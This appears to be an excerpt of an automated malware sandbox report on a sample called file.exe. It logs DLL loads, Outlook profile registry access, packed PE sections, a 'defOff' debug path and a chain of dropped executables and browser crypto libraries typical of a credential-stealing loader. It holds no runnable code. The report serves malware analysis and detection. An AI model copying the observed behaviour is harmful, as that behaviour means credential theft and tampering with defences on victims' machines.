Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1845248 > 1048576

Source: file.exe

Static PE information: Raw size of olxddulo is bigger than: 0x100000 < 0x1a8a00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 85c9ba9a2d.exe, 0000001E.00000003.2896719901.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, 85c9ba9a2d.exe, 0000001E.00000002.3030602387.0000000000F92000.00000040.00000001.01000000.00000011.sdmp, 85c9ba9a2d.exe, 00000020.00000002.3090281799.0000000000F92000.00000040.00000001.01000000.00000011.sdmp, 85c9ba9a2d.exe, 00000020.00000003.3049096078.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2439475773.000000006C6CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.750000.0.unpack :EW;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW;
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Unpacked PE file: 19.2.DocumentsJDAKJDAAFB.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 23.2.skotes.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fcsiqomq:EW;cxhhchgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Unpacked PE file: 24.2.167c7bdf2f.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Unpacked PE file: 25.2.d77e539f5f.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Unpacked PE file: 29.2.167c7bdf2f.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Unpacked PE file: 30.2.85c9ba9a2d.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W;oulglswr:EW;yzfglius:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Unpacked PE file: 31.2.d77e539f5f.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Unpacked PE file: 32.2.85c9ba9a2d.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W;oulglswr:EW;yzfglius:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Unpacked PE file: 33.2.167c7bdf2f.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;egvxbcad:EW;muahzetc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Unpacked PE file: 34.2.d77e539f5f.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;olxddulo:EW;pxsrqflz:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6BC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6BC410

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[2].exe.23.dr	Static PE information: real checksum: 0x2bb6c2 should be: 0x2b22a4
Source: 85c9ba9a2d.exe.23.dr	Static PE information: real checksum: 0x2bb6c2 should be: 0x2b22a4
Source: skotes.exe.19.dr	Static PE information: real checksum: 0x338728 should be: 0x331106
Source: d77e539f5f.exe.23.dr	Static PE information: real checksum: 0x1c5e7f should be: 0x1c7251
Source: random[1].exe.23.dr	Static PE information: real checksum: 0x317861 should be: 0x30b0b1
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: real checksum: 0x338728 should be: 0x331106
Source: file.exe	Static PE information: real checksum: 0x1c5e7f should be: 0x1c7251
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x338728 should be: 0x331106
Source: random[1].exe0.23.dr	Static PE information: real checksum: 0x1c5e7f should be: 0x1c7251
Source: 167c7bdf2f.exe.23.dr	Static PE information: real checksum: 0x317861 should be: 0x30b0b1

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: olxddulo
Source: file.exe	Static PE information: section name: pxsrqflz
Source: file.exe	Static PE information: section name: .taggant
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: fcsiqomq
Source: random[1].exe.0.dr	Static PE information: section name: cxhhchgb
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name:
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: fcsiqomq
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: cxhhchgb
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: .taggant
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name: fcsiqomq
Source: skotes.exe.19.dr	Static PE information: section name: cxhhchgb
Source: skotes.exe.19.dr	Static PE information: section name: .taggant
Source: random[1].exe.23.dr	Static PE information: section name:
Source: random[1].exe.23.dr	Static PE information: section name: .idata
Source: random[1].exe.23.dr	Static PE information: section name: egvxbcad
Source: random[1].exe.23.dr	Static PE information: section name: muahzetc
Source: random[1].exe.23.dr	Static PE information: section name: .taggant
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name:
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: .idata
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: egvxbcad
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: muahzetc
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: .taggant
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: olxddulo
Source: random[1].exe0.23.dr	Static PE information: section name: pxsrqflz
Source: random[1].exe0.23.dr	Static PE information: section name: .taggant
Source: d77e539f5f.exe.23.dr	Static PE information: section name:
Source: d77e539f5f.exe.23.dr	Static PE information: section name: .rsrc
Source: d77e539f5f.exe.23.dr	Static PE information: section name: .idata
Source: d77e539f5f.exe.23.dr	Static PE information: section name:
Source: d77e539f5f.exe.23.dr	Static PE information: section name: olxddulo
Source: d77e539f5f.exe.23.dr	Static PE information: section name: pxsrqflz
Source: d77e539f5f.exe.23.dr	Static PE information: section name: .taggant
Source: random[2].exe.23.dr	Static PE information: section name:
Source: random[2].exe.23.dr	Static PE information: section name: .idata
Source: random[2].exe.23.dr	Static PE information: section name: oulglswr
Source: random[2].exe.23.dr	Static PE information: section name: yzfglius
Source: random[2].exe.23.dr	Static PE information: section name: .taggant
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name:
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: .idata
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: oulglswr
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: yzfglius
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B536 push ecx; ret	0_2_6C68B549
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_007FD91C push ecx; ret	19_2_007FD92F
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_007F1359 push es; ret	19_2_007F135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BAD91C push ecx; ret	20_2_00BAD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BAD91C push ecx; ret	21_2_00BAD92F

Source: file.exe	Static PE information: section name: olxddulo entropy: 7.954298662543499
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.030431171834453
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: entropy: 7.030431171834453
Source: skotes.exe.19.dr	Static PE information: section name: entropy: 7.030431171834453
Source: random[1].exe.23.dr	Static PE information: section name: entropy: 7.089784792616947
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: entropy: 7.089784792616947
Source: random[1].exe0.23.dr	Static PE information: section name: olxddulo entropy: 7.954298662543499
Source: d77e539f5f.exe.23.dr	Static PE information: section name: olxddulo entropy: 7.954298662543499
Source: random[2].exe.23.dr	Static PE information: section name: entropy: 7.768287753209986
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: entropy: 7.768287753209986

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAKJDAAFB.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsJDAKJDAAFB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

